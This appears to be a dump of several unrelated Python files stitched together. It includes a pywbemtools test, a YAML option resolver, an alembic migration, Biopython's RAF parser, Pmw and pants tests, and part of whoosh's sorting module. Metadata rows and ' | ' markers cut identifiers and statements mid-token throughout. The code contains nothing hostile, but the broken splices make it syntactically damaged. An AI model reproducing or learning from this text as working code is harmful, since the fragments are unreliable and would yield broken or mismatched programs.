# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit test of connection repository class. Tests the capability to create and
modify good repositories and to catch load errors for repositories that have
errors in the data.
"""
from __future__ import absolute_import, print_function
import sys
import os
import io
from contextlib import contextmanager
from mock import patch
import pytest
import pywbemtools.pywbemcli._connection_repository
from pywbemtools.pywbemcli._connection_repository import ConnectionRepository, \
ConnectionsFileLoadError, ConnectionsFileWriteError
from pywbemtools._utils import B08_DEFAULT_CONNECTIONS_FILE, \
DEFAULT_CONNECTIONS_FILE
from pywbemtools.pywbemcli._pywbem_server import PywbemServer
from ..pytest_extensions import simplified_test_function
# Click (as of 7.1.2) raises UnsupportedOperation in click.echo() when
# the pytest capsys fixture is used. That happens only on Windows.
# See Click issue https://github.com/pallets/click/issues/1590. This
# run condition skips the testcases on Windows.
CLICK_ISSUE_1590 = sys.platform == 'win32'
SCRIPT_DIR = os.path.dirname(__file__)
CONNECTION_REPO_TEST_FILE_PATH = os.path.join(SCRIPT_DIR,
'tst_connection_repository.yaml')
YAML_GOOD_TWO_DEFS = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
tst2:
name: tst2
server: http://blah
user: null
password: null
default-namespace: root/cimv2
timeout: 30
use_pull: true
pull_max_cnt: 98
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_GOOD_NO_DEF = u"""connection_definitions: {}
default_connection_name: null
"""
YAML_MISSING_DEFAULT = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
"""
YAML_MISSING_CONNDEFS = u"""tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_INVALID_ATTR_NAME = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeoutx: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_INVALID_SYNTAX = u"""connection_definitions:
*+&%:
default_connection_name: null
"""
YAML_INVALID_MOCKSERVER_TYPE = u"""connection_definitions:
tst1:
name: tst1
mock-server: 42
default_connection_name: null
"""
YAML_INVALID_TIMEOUT_VALUE = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
timeout: -100
default_connection_name: null
"""
YAML_SERVER_AND_MOCKSERVER = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
mock-server: 'blah'
default_connection_name: null
"""
OK = True # mark tests OK when they execute correctly
RUN = True # Mark OK = False and current test case being created RUN
FAIL = False # Any test currently FAILING or not tested yet
@pytest.fixture()
def remove_file_before_after():
"""
Remove the connections file at beginning and end of test.
"""
| file = CONNECTION_REPO_TEST_FILE_PATH
if os.path.isfile(file):
os.remove(file)
file = CONNECTION_REPO_TEST_FILE_PATH + '.bak'
if os.path.isfile(file):
os.remove(file)
file = CONNECTION_REPO_TEST_FILE_PATH + '.tmp'
if os.path.isfile(file):
| os.remove(file)
# The yield causes the remainder of this fixture to be executed at the
# end of the test.
yield
file = CONNECTION_REPO_TEST_FILE_PATH
if os.path.isfile(file):
os.remove(file)
file = CONNECTION_REPO_TEST_FILE_PATH + '.bak'
if os.path.isfile(file):
os.remove(file)
file = CONNECTION_REPO_TEST_FILE_PATH + '.tmp'
if os.path.isfile(file):
os.remove(file)
# The real functions before they get patched
REAL_OS_RENAME = os.rename
REAL_OS_RENAME_STR = 'os.rename'
# pylint: disable=protected-access
REAL_OPEN_TEXT_FILE = \
pywbemtools.pywbemcli._connection_repository.open_text_file
REAL_OPEN_TEXT_FILE_STR = \
'pywbemtools.pywbemcli._connection_repository.open_text_file'
def rename_to_bak_fails(file1, file2):
"""
Patch function replacing os.rename() that raises OSError when the target
file ends with '.bak'.
"""
if file2.endswith('.bak'):
raise OSError("Mocked failure: Cannot rename {} to {}".
format(file1, file2))
REAL_OS_RENAME(file1, file2)
def rename_from_tmp_fails(file1, file2):
"""
Patch function replacing os.rename() that raises OSError when the source
file ends with '.tmp'.
"""
if file1.endswith('.tmp'):
raise OSError("Mocked failure: Cannot rename {} to {}".
format(file1, file2))
REAL_OS_RENAME(file1, file2)
def rename_fails(file1, file2):
"""
Patch function replacing os.rename() that raises OSError.
"""
raise OSError("Mocked failure: Cannot rename {} to {}".
format(file1, file2))
@contextmanager
def open_text_file_write_fails(filename, file_mode):
"""
Patch function replacing open_text_file() that raises
OSError when the file is opened in write mode.
"""
if 'w' in file_mode:
raise OSError("Mocked failure: Cannot open {} in mode {}".
format(filename, file_mode))
# Delegate the context manager yield to REAL_OPEN_TEXT_FILE()
return REAL_OPEN_TEXT_FILE(filename, file_mode)
@contextmanager
def open_text_file_read_fails(filename, file_mode):
"""
Patch function replacing open_text_file() that raises
OSError when the file is opened in read mode.
"""
if 'r' in file_mode:
raise OSError("Mocked failure: Cannot open {} in mode {}".
format(filename, file_mode))
# Delegate the context manager yield to REAL_OPEN_TEXT_FILE()
return REAL_OPEN_TEXT_FILE(filename, file_mode)
# Testcases for create ConnectionRepository
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * file: test file path. File to test built into this file path
# * svrs: Zero or more instances of PywbemServer class
# * default: value to set as default server
# * exp_rtn: Expected return value of _format_instances_as_rows().
# * keys: keys expected in file
# * default: Value for default server |
hcpss-banderson/py-tasc | optionresolver.py | Python | mit | 1,993 | 0.018565 | import optparse, yaml, json
class OptionResolver(object):
"""Resolve user input options"""
def __init__(self):
self.parser = optparse.OptionParser()
s | elf.set_options()
def set_options(self):
"""Use optparser to manage options"""
self.parser.add_option(
"--manifest", "-m",
help | = "The location of the manifest file.",
default = "./manifest.yml")
self.parser.add_option(
"--destination", "-d",
help = "Where to assemble the code.",
default = ".")
self.parser.add_option(
"--extra-parameters", "-e",
help = "A JSON encoded string with extra parameters.")
def parse(self):
"""Return the raw parsed user supplied values
:rtype: dict[str, str]
"""
return self.parser.parse_args()[0]
def manifest_location(self):
"""Return the location of the manifest file
:rtype: str
"""
return self.parse().manifest
def manifest(self):
"""Get the parsed values from the manifest
:rtype: dict[str, mixed]
"""
with open(self.manifest_location(), "r") as stream:
yamlstring = stream.read()
# Allow token replacements
params = self.extra_parameters()
if params:
yamlstring = yamlstring.format(**params)
return yaml.load(yamlstring)
def destination(self):
"""Get the assembly location
:rtype: str
"""
return self.parse().destination
def extra_parameters(self):
"""Get extra parameters
:rtype: dict[str, str]
"""
params_string = self.parse().extra_parameters
if params_string:
return json.loads(self.parse().extra_parameters)
|
pythonvietnam/pbc082015 | vumanhcuong/Day3/khonghieu.py | Python | gpl-2.0 | 204 | 0.019608 | #Ba | i tap ve nha | ngay 3 (20150827)
a = raw_input ("Nhap vao 1 chuoi so:")
#print "So nay:", a
print "So ki tu a la:", a.count("a")
print "So ki tu b la:", a.count("b")
print "So ki tu c la:", a.count("c") |
ergo/ziggurat_foundations | ziggurat_foundations/migrations/versions/46a9c4fb9560_pass_col_sizes.py | Python | bsd-3-clause | 594 | 0.003367 | " | ""make password hash field bigger
Revision ID: 46a9c4fb9560
Revises: 5c84d7260c5
Create Date: 2011-12-20 17:59:16.961112
"""
from __future__ import unicode_literals
import sqlalchemy as sa
from alembic import op
# downgrade revision identifier, used by Alembic.
revision = "46a9c4fb9560"
down_revision = "5c84d7260c5"
def upgrade():
op.alter_column(
"users", "user_password", type_=sa.Unicode(256), existing_type=sa.Unicode(40)
)
op.alter_column(
"users", "security_code", | type_=sa.Unicode(256), existing_type=sa.Unicode(40)
)
def downgrade():
pass
|
BlogomaticProject/Blogomatic | opt/blog-o-matic/usr/lib/python/Bio/SCOP/Raf.py | Python | gpl-2.0 | 12,101 | 0.019337 | # Copyright 2001 by Gavin E. Crooks. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Gavin E. Crooks 2001-10-10
"""ASTRAL RAF (Rapid Access Format) Sequence Maps.
The ASTRAL RAF Sequence Maps record the relationship between the PDB SEQRES
records (representing the sequence of the molecule used in an experiment) to
the ATOM records (representing the atoms experimentally observed).
This data is derived from the Protein Data Bank CIF files. Known errors in the
CIF files are corrected manually, with the original PDB file serving as the
final arbiter in case of discrepancies.
Residues are referenced by residue ID. This consists of a the PDB residue
sequence number (upto 4 digits) and an optional PDB insertion code (an
ascii alphabetic character, a-z, A-Z). e.g. "1", "10A", "1010b", "-1"
See "ASTRAL RAF Sequence Maps":http://astral.stanford.edu/raf.html
to_one_letter_code -- A mapping from the 3-letter amino acid codes found
in PDB files to 1-letter codes. The 3-letter codes
include chemically modified residues.
"""
from copy import copy
from Bio.SCOP.Residues import Residues
# This table is taken from the RAF release notes, and includes the
# undocumented mapping "UNK" -> "X"
to_one_letter_code= {
'ALA':'A', 'VAL':'V', 'PHE':'F', 'PRO':'P', 'MET':'M',
'ILE':'I', 'LEU':'L', 'ASP':'D', 'GLU':'E', 'LYS':'K',
'ARG':'R', 'SER':'S', 'THR':'T', 'TYR':'Y', 'HIS':'H',
'CYS':'C', 'ASN':'N', 'GLN':'Q', 'TRP':'W', 'GLY':'G',
'2AS':'D', '3AH':'H', '5HP':'E', 'ACL':'R', 'AIB':'A',
'ALM':'A', 'ALO':'T', 'ALY':'K', 'ARM':'R', 'ASA':'D',
'ASB':'D', 'ASK':'D', 'ASL':'D', 'ASQ':'D', 'AYA':'A',
'BCS':'C', 'BHD':'D', 'BMT':'T', 'BNN':'A', 'BUC':'C',
'BUG':'L', 'C5C':'C', 'C6C':'C', 'CCS':'C', 'CEA':'C',
'CHG':'A', 'CLE':'L', 'CME':'C', 'CSD':'A', 'CSO':'C',
'CSP':'C', 'CSS':'C', 'CSW':'C', 'CXM':'M', 'CY1':'C',
'CY3':'C', 'CYG':'C', 'CYM':'C', 'CYQ':'C', 'DAH':'F',
'DAL':'A', 'DAR':'R', 'DAS':'D', 'DCY':'C', 'DGL':'E',
'DGN':'Q', 'DHA':'A', 'DHI':'H', 'DIL':'I', 'DIV':'V',
'DLE':'L', 'DLY':'K', 'DNP':'A', 'DPN':'F', 'DPR':'P',
'DSN':'S', 'DSP':'D', 'DTH':'T', 'DTR':'W', 'DTY':'Y',
'DVA':'V', | 'EFC':'C', 'FLA':'A', 'FME':'M', 'GGL':'E',
'GLZ':'G', 'GMA':'E', 'GSC':'G', 'HAC':'A', 'HAR':'R',
'HIC':'H', 'HIP':'H', 'HMR':'R', 'HPQ':'F', 'HTR':'W',
'HYP':'P', 'IIL':'I', 'IYR':'Y', 'KCX':'K', 'LLP':'K',
'LLY':'K', 'LTR':'W', 'LYM':'K', 'LYZ':'K', 'MAA':'A',
'MEN':'N', 'MHS':'H', 'MIS':'S', | 'MLE':'L', 'MPQ':'G',
'MSA':'G', 'MSE':'M', 'MVA':'V', 'NEM':'H', 'NEP':'H',
'NLE':'L', 'NLN':'L', 'NLP':'L', 'NMC':'G', 'OAS':'S',
'OCS':'C', 'OMT':'M', 'PAQ':'Y', 'PCA':'E', 'PEC':'C',
'PHI':'F', 'PHL':'F', 'PR3':'C', 'PRR':'A', 'PTR':'Y',
'SAC':'S', 'SAR':'G', 'SCH':'C', 'SCS':'C', 'SCY':'C',
'SEL':'S', 'SEP':'S', 'SET':'S', 'SHC':'C', 'SHR':'K',
'SOC':'C', 'STY':'Y', 'SVA':'S', 'TIH':'A', 'TPL':'W',
'TPO':'T', 'TPQ':'A', 'TRG':'K', 'TRO':'W', 'TYB':'Y',
'TYQ':'Y', 'TYS':'Y', 'TYY':'Y', 'AGM':'R', 'GL3':'G',
'SMC':'C', 'ASX':'B', 'CGU':'E', 'CSX':'C', 'GLX':'Z',
'PYX':'C',
'UNK':'X'
}
def normalize_letters(one_letter_code):
"""Convert RAF one-letter amino acid codes into IUPAC standard codes.
Letters are uppercased, and "." ("Unknown") is converted to "X".
"""
if one_letter_code == '.':
return 'X'
else:
return one_letter_code.upper()
class SeqMapIndex(dict):
"""An RAF file index.
The RAF file itself is about 50 MB. This index provides rapid, random
access of RAF records without having to load the entire file into memory.
The index key is a concatenation of the PDB ID and chain ID. e.g
"2drcA", "155c_". RAF uses an underscore to indicate blank
chain IDs.
"""
def __init__(self, filename):
"""
Arguments:
filename -- The file to index
"""
dict.__init__(self)
self.filename = filename
f = open(self.filename, "rU")
try:
position = 0
while True:
line = f.readline()
if not line: break
key = line[0:5]
if key != None:
self[key]=position
position = f.tell()
finally:
f.close()
def __getitem__(self, key):
""" Return an item from the indexed file. """
position = dict.__getitem__(self,key)
f = open(self.filename, "rU")
try:
f.seek(position)
line = f.readline()
record = SeqMap(line)
finally:
f.close()
return record
def getSeqMap(self, residues):
"""Get the sequence map for a collection of residues.
residues -- A Residues instance, or a string that can be converted into
a Residues instance.
"""
if isinstance(residues, basestring):
residues = Residues(residues)
pdbid = residues.pdbid
frags = residues.fragments
if not frags: frags =(('_','',''),) # All residues of unnamed chain
seqMap = None
for frag in frags:
chainid = frag[0]
if chainid=='' or chainid=='-' or chainid==' ' or chainid=='_':
chainid = '_'
id = pdbid + chainid
sm = self[id]
#Cut out fragment of interest
start = 0
end = len(sm.res)
if frag[1] : start = int(sm.index(frag[1], chainid))
if frag[2] : end = int(sm.index(frag[2], chainid)+1)
sm = sm[start:end]
if seqMap == None:
seqMap = sm
else:
seqMap += sm
return seqMap
class SeqMap(object):
"""An ASTRAL RAF (Rapid Access Format) Sequence Map.
This is a list like object; You can find the location of particular residues
with index(), slice this SeqMap into fragments, and glue fragments back
together with extend().
pdbid -- The PDB 4 character ID
pdb_datestamp -- From the PDB file
version -- The RAF format version. e.g. 0.01
flags -- RAF flags. (See release notes for more information.)
res -- A list of Res objects, one for each residue in this sequence map
"""
def __init__(self, line=None):
self.pdbid = ''
self.pdb_datestamp = ''
self.version = ''
self.flags = ''
self.res = []
if line:
self._process(line)
def _process(self, line):
"""Parses a RAF record into a SeqMap object.
"""
header_len = 38
line = line.rstrip() # no trailing whitespace
if len(line)<header_len:
raise ValueError("Incomplete header: "+line)
self.pdbid = line[0:4]
chainid = line[4:5]
self.version = line[6:10]
#Raf format versions 0.01 and 0.02 are identical for practical purposes
if(self.version != "0.01" and self.version !="0.02"):
raise ValueError("Incompatible RAF version: "+self.version)
self.pdb_datestamp = line[14:20]
self.flags = line[21:27]
for i in range(header_len, len(line), 7):
f = line[i : i+7]
if len(f)!=7:
raise ValueError("Corrupt Field: ("+f+")")
r = Res()
r.chainid = chainid
r.resid = f[0:5].strip()
r.atom = normalize_letters(f[5:6])
r.seqres = normalize_letters(f[6:7])
self.res.append(r)
def index(self, resid, chainid="_"):
for i in range(0, len(self.res)):
if self.res[i].resid == resid and self.res[i].chainid == chainid:
return i
raise KeyError("No such residue "+chainid+resid)
def __getitem__(self, index):
if |
mhcrnl/PmwTkEx | src/Pmw/Pmw_1_3/tests/CounterDialog_test.py | Python | apache-2.0 | 2,577 | 0.001552 | import Tkinter
import Test
import Pmw
Test.initialise()
c = Pmw.CounterDialog
kw_1 = {
'counter_labelpos': 'n',
'counter_buttonaspect': 2.0,
'counter_autorepeat': 0,
'counter_initwait': 1000,
'counter_padx': 5,
'counter_pady': 5,
'counter_repeatrate': 20,
'label_text' : 'Counter:',
'buttons' : ('OK', 'Cancel', 'Help'),
}
tests_1 = (
(Test.num_options, (), 11),
('counter_Arrow_borderwidth', 10),
('counter_hull_background', 'yellow'),
('command', Test.callback1),
('hull_cursor', 'gumby'),
('counter_datatype', 'time'),
('counter_datatype', 'numeric'),
('entry_borderwidth', 6),
('entry_relief', 'raised'),
('entry_exportselection', 0),
('entry_foreground', 'blue'),
('hull_highlightcolor', 'Red'),
('hull_highlightthickness', 2),
('counter_increment', 1),
('entry_insertbackground', 'Yellow'),
('entry_insertbackground', 'Black'),
('entry_insertborderwidth', 1),
| ('entry_insertborderwidth', 0),
('entry_insertofftime', 400),
('entry_insertontime', 700),
('entry_insertwidth', 3),
('entryfield_invalidcommand', Test.callback),
| ('entry_show', '*'),
('entry_background', 'red'),
(c.setentry, '69', 1),
('entry_justify', 'right'),
('entry_justify', 'center'),
('entry_justify', 'left'),
('label_text', 'Label'),
('entry_relief', 'raised'),
('entry_relief', 'sunken'),
('entry_state', 'disabled'),
('entry_state', 'normal'),
('entry_background', 'GhostWhite'),
('entryfield_validate', 'numeric'),
('entryfield_validate', 'alphabetic'),
('entry_width', 30),
('relief', 'bogus', 'KeyError: Unknown option "relief" for CounterDialog'),
(c.interior, (), Tkinter.Frame),
(c.insert, ('end', 69)),
(c.increment, ()),
(c.decrement, ()),
('defaultbutton', 1),
(c.invoke, (), 'Cancel'),
(c.clear, ()),
(c.get, (), ''),
(c.insert, ('end', 'Test String')),
(c.get, (), 'Test String'),
(c.delete, (0, 'end')),
(c.insert, ('end', 'Another Test')),
(c.icursor, 'end'),
(c.index, 'end', 12),
(c.selection_from, 0),
(c.selection_to, 'end'),
(c.xview, '3'),
(c.clear, ()),
)
kw_2 = {
'buttonboxpos': 'e',
'counter_labelpos': 'w',
'label_text' : 'Another counter',
'buttonbox_pady': 25,
'buttons' : ('OK', 'Cancel'),
}
tests_2 = (
(c.title, 'CounterDialog 2', ''),
)
alltests = (
(tests_1, kw_1),
(tests_2, kw_2),
)
testData = ((c, alltests),)
if __name__ == '__main__':
Test.runTests(testData)
|
fxstein/ISYlib-python | ISY/_isyclimate.py | Python | bsd-2-clause | 1,533 | 0.001305 | """
This is a subfile for IsyClass.py
These funtions are accessable via the Isy class opj
"""
__author__ = 'Peter Shipley <peter.shipley@gmail.com>'
__copyright__ = "Copyright (C) 2013 Peter Shipley"
__license__ = "BSD"
import time
##
## Climate funtions
##
def load_clim(self):
""" Load climate data from ISY device
args: none
internal function call
"""
if self.debug & 0x01:
print("load_clim")
clim_tree = self._getXMLetree("/rest/climate")
self.climateinfo = dict()
if clim_tree is None:
return
# Isy._printXML(self.climateinfo)
for cl in clim_tree.iter("climate"):
for k, v in cl.items():
self.climateinfo[k] = v
for ce in list(cl):
self.climateinfo[ce.tag] = ce.text
self.climateinfo["time"] = time.gmtime()
| def clim_get_val(self, prop):
pass
def clim_query(self):
""" returns dictionary of climate info """
if not self.climateinfo:
self.load_clim()
#
# ADD CODE to check self.cachetime
#
return self.climateinfo
def clim_iter(self):
""" Iterate though climate values
args:
None
returns:
Return | an iterator over the climate values
"""
if not self.climateinfo:
self.load_clim()
k = self.climateinfo.keys()
for p in k:
yield self.climateinfo[p]
# Do nothing
# (syntax check)
#
if __name__ == "__main__":
import __main__
print(__main__.__file__)
print("syntax ok")
exit(0)
|
square/pants | tests/python/pants_test/engine/test_engine.py | Python | apache-2.0 | 2,994 | 0.007348 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from pants.base.exceptions import TaskError
from pants.engine.engine import Engine
from pants_test.base.context_utils import create_context
from pants_test.engine.base_engine_test import EngineTestBase
# TODO(John Sirois): Kill this test - the core Engine should unlearn dependencies ordering
# and leave this to subclasses that can form a strategy for this like RoundEngine.
class ExecutionOrderTest(EngineTestBase):
def test_execution_order(self):
self.install_task('invalidate')
self.install_task('clean-all', dependencies=['invalidate'])
self.install_task('resolve')
self.install_task('javac', dependencies=['resolve'], goal='compile')
self.install_task('scalac', dependencies=['resolve'], goal='compile')
self.install_task('junit', dependencies=['compile'], goal='test')
self.assertEqual(self.as_goals('invalidate', 'clean-all', 'resolve', 'compile', 'test'),
list(Engine.execution_order(self.as_goals('clean-all', 'test'))))
self.assertEqual(self.as_goals('resolve', 'compile', 'test', 'invalidate', 'clean-all'),
list(Engine.execution_order(self.as_goals('test', 'clean-all'))))
class EngineTest(EngineTestBase):
class RecordingEngine(Engine):
def __init__(self, action=None):
super(EngineTest.RecordingEngine, self).__init__()
self._action = action
self._attempts = []
@property
def attempts(self):
return self._attempts
def attempt(self, context, goals):
self._attempts.append((context, goals))
if self._action:
self._action()
def setUp(self):
self.context = create_context()
def assert_attempt(self, engine, *goal_names):
self.assertEqual(1, len( | engine.attempts))
context, | goals = engine.attempts[0]
self.assertEqual(self.context, context)
self.assertEqual(self.as_goals(*goal_names), goals)
def test_execute_success(self):
engine = self.RecordingEngine()
result = engine.execute(self.context, self.as_goals('one', 'two'))
self.assertEqual(0, result)
self.assert_attempt(engine, 'one', 'two')
def _throw(self, error):
def throw():
raise error
return throw
def test_execute_raise(self):
engine = self.RecordingEngine(action=self._throw(TaskError()))
result = engine.execute(self.context, self.as_goals('three'))
self.assertEqual(1, result)
self.assert_attempt(engine, 'three')
def test_execute_code(self):
engine = self.RecordingEngine(action=self._throw(TaskError(exit_code=42)))
result = engine.execute(self.context, self.as_goals('four', 'five', 'six'))
self.assertEqual(42, result)
self.assert_attempt(engine, 'four', 'five', 'six')
|
awakenting/gif_fitting | fitgif/Filter_Rect_LogSpaced.py | Python | gpl-3.0 | 7,817 | 0.024562 | import numpy as np
from scipy.signal import fftconvolve
from . import Tools
from .Filter import Filter
class Filter_Rect_LogSpaced(Filter) :
"""
This class defines a function of time expanded using log-spaced rectangular basis functions.
A filter f(t) is defined in the form f(t) = sum_j b_j*rect_j(t),
where b_j is a set of coefficient and rect_j is a set of rectangular basis functions.
The width of the rectangular basis | functions increase exponentially (log-spacing).
This class is used to define both the spike-triggered current eta(t) and the spike-triggered
movement of the firing threshold gamma(t).
"""
def __init__(self, length=1000.0, binsize_lb=2.0, binsiz | e_ub=1000.0, slope=7.0):
Filter.__init__(self)
self.p_length = length # ms, filter length
self.p_binsize_lb = binsize_lb # ms, min size for bin
self.p_binsize_ub = binsize_ub # ms, max size for bin
self.p_slope = slope # exponent for log-scale binning
# Auxiliary variables that can be computed using the parameters above
self.bins = [] # ms, vector defining the rectangular basis functions for f(t)
self.support = [] # ms, centers of bins used to define the filter
self.bins_l = 0 # nb of bins used to define the filter
# Initialize
self.computeBins() # using meta parameters self.metaparam_subthreshold define bins and support.
self.setFilter_toZero() # initialize filter to 0
#############################################################################
# Set functions
#############################################################################
def setFilter_Function(self, f):
"""
Given a function of time f(t), the bins of the filer are initialized accordingly.
For example, if f(t) is an exponential function, the filter will approximate an exponential using rectangular basis functions
"""
self.computeBins()
self.filter_coeff = f(self.support)
def setFilter_Coefficients(self, coeff):
"""
Set the coefficients of the filter (i.e. the values that define the magnitude of each rectangular function)
"""
self.computeBins()
if len(coeff) == self.bins_l :
self.filter_coeff = coeff
else :
print ("Error, the number of coefficients do not match the number of basis functions!")
def setFilter_toZero(self):
"""
Set the coefficients of the filter to 0
"""
self.computeBins()
self.filter_coeff = np.zeros(self.bins_l)
#############################################################################
# Get functions
#############################################################################
def getInterpolatedFilter(self, dt) :
"""
Given a particular dt, the function compute and return the support t and f(t).
"""
self.computeBins()
bins_i = Tools.timeToIndex(self.bins, dt)
if self.getNbOfBasisFunctions() == len(self.filter_coeff) :
filter_interpol = np.zeros( (bins_i[-1] - bins_i[0]) )
for i in range(len(self.filter_coeff)) :
lb = int(bins_i[i])
ub = int(bins_i[i+1])
filter_interpol[lb:ub] = self.filter_coeff[i]
filter_interpol_support = np.arange(len(filter_interpol))*dt
return (filter_interpol_support, filter_interpol)
else :
print ("Error: value of the filter coefficients does not match the number of basis functions!")
def getNbOfBasisFunctions(self) :
"""
Return the number of rectangular basis functions used to define the filter.
"""
self.computeBins()
return int(self.bins_l)
def getLength(self):
return self.bins[-1]
#############################################################################
# Functions to compute convolutions
#############################################################################
def convolution_Spiketrain_basisfunctions(self, spks, T, dt):
T_i = int(T/dt)
bins_i = Tools.timeToIndex(self.bins, dt)
spks_i = Tools.timeToIndex(spks, dt)
nb_bins = self.getNbOfBasisFunctions()
X = np.zeros( (T_i, nb_bins) )
# Fill matrix
for l in np.arange(nb_bins) :
tmp = np.zeros( T_i + bins_i[-1] + 1 )
for s in spks_i :
lb = s + bins_i[l]
ub = s + bins_i[l+1]
tmp[lb:ub] += 1
X[:,l] = tmp[:T_i]
return X
def convolution_ContinuousSignal_basisfunctions(self, I, dt):
T_i = len(I)
bins_i = Tools.timeToIndex(self.bins, dt)
bins_l = self.getNbOfBasisFunctions()
X = np.zeros( (T_i, bins_l) )
I_tmp = np.array(I,dtype='float64')
# Fill matrix
for l in np.arange(bins_l) :
window = np.ones( bins_i[l+1] - bins_i[l])
window = np.array(window,dtype='float64')
F_star_I = fftconvolve(window, I_tmp, mode='full')*dt
F_star_I = F_star_I[: int(len(I))]
F_star_I_shifted = np.concatenate( ( np.zeros( int(bins_i[l]) ), F_star_I) )
X[:,l] = np.array(F_star_I_shifted[:T_i], dtype='double')
return X
########################################################################################
# AUXILIARY METHODS USED BY THIS PARTICULAR IMPLEMENTATION OF FILTER
########################################################################################
def computeBins(self) :
"""
This function compute bins and support given the metaparameters.
"""
self.bins = []
self.bins.append(0)
cnt = 1
total_length = 0
while (total_length <= self.p_length) :
tmp = min( self.p_binsize_lb*np.exp(cnt/self.p_slope), self.p_binsize_ub )
total_length = total_length + tmp
self.bins.append( total_length )
cnt+=1
self.bins = np.array(self.bins)
self.support = np.array( [ (self.bins[i]+self.bins[i+1])/2 for i in range(len(self.bins)-1) ])
self.bins_l = len(self.bins)-1
def setMetaParameters(self, length=1000.0, binsize_lb=2.0, binsize_ub=1000.0, slope=7.0):
"""
Set the parameters defining the rectangular basis functions.
Attention, each time meta parameters are changes, the value of the filer is reset to 0.
"""
self.p_length = length # ms, filter length
self.p_binsize_lb = binsize_lb # ms, min size for bin
self.p_binsize_ub = binsize_ub # ms, max size for bin
self.p_slope = slope # exponent for log-scale binning
self.computeBins()
self.setFilter_toZero()
|
bdh1011/cupeye | venv/lib/python2.7/site-packages/whoosh/sorting.py | Python | bsd-3-clause | 41,932 | 0.000191 | # Copyright 2011 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from array import array
from collections import defaultdict
from whoosh.compat import string_type
from whoosh.compat import iteritems, izip, xrange
# Faceting objects
class FacetType(object):
"""Base class for "facets", aspects that can be sorted/faceted.
"""
maptype = None
def categorizer(self, global_searcher):
"""Returns a :class:`Categorizer` corresponding to this facet.
:param global_searcher: A parent searcher. You can use this searcher if
you need global document ID references.
"""
raise NotImplementedError
def map(self, default=None):
t = self.maptype
if t is None:
t = default
if t is None:
return OrderedList()
elif type(t) is type:
return t()
else:
return t
def default_name(self):
return "facet"
class Categorizer(object):
"""Base class for categorizer objects which compute a key value for a
document based on certain criteria, for use in sorting/faceting.
Categorizers are created by FacetType objects through the
:meth:`FacetType.categorizer` method. The
:cla | ss:`whoosh.searching.Searcher` object passed to the ``categorizer``
method may be a composite searcher (that is, wrapping a multi-reader), but
categorizers ar | e always run **per-segment**, with segment-relative document
numbers.
The collector will call a categorizer's ``set_searcher`` method as it
searches each segment to let the cateogorizer set up whatever segment-
specific data it needs.
``Collector.allow_overlap`` should be ``True`` if the caller can use the
``keys_for`` method instead of ``key_for`` to group documents into
potentially overlapping groups. The default is ``False``.
If a categorizer subclass can categorize the document using only the
document number, it should set ``Collector.needs_current`` to ``False``
(this is the default) and NOT USE the given matcher in the ``key_for`` or
``keys_for`` methods, since in that case ``segment_docnum`` is not
guaranteed to be consistent with the given matcher. If a categorizer
subclass needs to access information on the matcher, it should set
``needs_current`` to ``True``. This will prevent the caller from using
optimizations that might leave the matcher in an inconsistent state.
"""
allow_overlap = False
needs_current = False
def set_searcher(self, segment_searcher, docoffset):
"""Called by the collector when the collector moves to a new segment.
The ``segment_searcher`` will be atomic. The ``docoffset`` is the
offset of the segment's document numbers relative to the entire index.
